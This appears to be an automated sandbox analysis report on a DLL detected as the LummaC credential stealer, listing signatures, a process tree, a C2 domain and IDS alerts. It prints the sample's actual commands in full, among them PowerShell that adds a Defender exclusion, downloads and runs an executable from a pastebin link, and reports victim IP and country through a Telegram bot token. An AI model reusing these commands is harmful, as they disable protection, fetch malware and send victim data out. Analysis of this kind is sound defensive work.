Edit tour

Windows Analysis Report
SystemCoreHelper.dll

Overview

General Information

Sample name:	SystemCoreHelper.dll
Analysis ID:	1561436
MD5:	319c704031bc817ada8882e1a55b330e
SHA1:	30850826f44f8a70659a7b955ca0d06dd158b22a
SHA256:	832d09109784aa6d472af5e1e93a40d9987fa9d85859c1f803180ed20eb3ac80
Tags:	dlluser-4k95m
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected Powershell download and execute

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

PE file contains section with special chars

PE file has nameless sections

Powershell drops PE file

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: PowerShell DownloadFile

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Tries to download and execute files (via powershell)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Powershell Defender Exclusion

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 2596 cmdline: loaddll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)

conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3384 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

rundll32.exe (PID: 2492 cmdline: rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 3120 cmdline: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled MD5: 889B99C52A60DD49227C5E485A016679)

csc.exe (PID: 6628 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

conhost.exe (PID: 772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 3488 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES42BA.tmp" "c:\Users\user\AppData\Local\Temp\1ixib5wl\CSC291E15774B6A482B9669CEACC9B56C.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

powershell.exe (PID: 3512 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7516 cmdline: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

zbjnkzvo4cc.exe (PID: 8012 cmdline: "C:\Windows\Temp\zbjnkzvo4cc.exe" MD5: 1D08526FC81B1D62195F4E5DEA52BB6F)

conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aspnet_regiis.exe (PID: 8084 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)

WerFault.exe (PID: 8180 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 1232 MD5: C31336C1EFC2CCB44B4326EA793040F2)

powershell.exe (PID: 7680 cmdline: "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7588 cmdline: "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2256 cmdline: "powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rundll32.exe (PID: 7188 cmdline: rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",GetCompiled MD5: 889B99C52A60DD49227C5E485A016679)

csc.exe (PID: 7220 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 7320 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4E05.tmp" "c:\Users\user\AppData\Local\Temp\juqgin2j\CSCBFD98E15EAE94B1A9A3E8A6348847C3D.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

powershell.exe (PID: 7348 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7664 cmdline: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\mxtvcgq32fe.exe')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mxtvcgq32fe.exe (PID: 6656 cmdline: "C:\Windows\Temp\mxtvcgq32fe.exe" MD5: 1D08526FC81B1D62195F4E5DEA52BB6F)

conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 1196 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6656 -s 1212 MD5: C31336C1EFC2CCB44B4326EA793040F2)

powershell.exe (PID: 5436 cmdline: "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1880 cmdline: "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7748 cmdline: "powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["revirepart.biz"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.0.cs	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.0.cs	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: rundll32.exe PID: 3120	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: csc.exe PID: 6628	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: rundll32.exe PID: 7188	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: csc.exe PID: 7220	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7516	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7664	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: zbjnkzvo4cc.exe PID: 8012	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 8084	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 8084	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 8084	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 6 entries

Other

Source	Rule	Description	Author	Strings
amsi32_7516.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi32_7664.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell DownloadFile

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')", CommandLine: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')", ProcessId: 7516, ProcessName: powershell.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 3512, ProcessName: powershell.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 3512, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 3512, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 3512, ProcessName: powershell.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline", ProcessId: 6628, ProcessName: csc.exe

Sigma detected: PowerShell Download Pattern

Source: Process started

Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')", CommandLine: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')", ProcessId: 7516, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')", CommandLine: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')", ProcessId: 7516, ProcessName: powershell.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 3120, TargetFilename: C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 3512, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline", ProcessId: 6628, ProcessName: csc.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T12:47:25.179692+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	172.67.184.174	443	TCP
2024-11-23T12:47:27.796297+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	104.21.88.250	443	TCP
2024-11-23T12:47:29.882269+0100	2028371	3	Unknown Traffic	192.168.2.4	49747	104.21.88.250	443	TCP
2024-11-23T12:47:32.221521+0100	2028371	3	Unknown Traffic	192.168.2.4	49748	104.21.88.250	443	TCP
2024-11-23T12:47:34.437519+0100	2028371	3	Unknown Traffic	192.168.2.4	49749	104.21.88.250	443	TCP
2024-11-23T12:47:36.720382+0100	2028371	3	Unknown Traffic	192.168.2.4	49751	104.21.88.250	443	TCP
2024-11-23T12:47:39.525155+0100	2028371	3	Unknown Traffic	192.168.2.4	49752	104.21.88.250	443	TCP
2024-11-23T12:47:41.972082+0100	2028371	3	Unknown Traffic	192.168.2.4	49754	104.21.88.250	443	TCP
2024-11-23T12:47:43.665732+0100	2028371	3	Unknown Traffic	192.168.2.4	49756	104.21.88.250	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T12:47:26.072559+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49741	172.67.184.174	443	TCP
2024-11-23T12:47:28.497950+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49744	104.21.88.250	443	TCP
2024-11-23T12:47:30.610883+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49747	104.21.88.250	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T12:47:26.072559+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49741	172.67.184.174	443	TCP
2024-11-23T12:47:28.497950+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49744	104.21.88.250	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T12:47:30.610883+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49747	104.21.88.250	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (revirepart .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T12:47:25.179692+0100	2057647	1	Domain Observed Used for C2 Detected	192.168.2.4	49741	172.67.184.174	443	TCP

ET MALWARE Single char EXE direct download likely trojan (multiple families)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T12:47:15.408983+0100	2018581	1	A Network Trojan was detected	192.168.2.4	49734	192.81.132.76	80	TCP
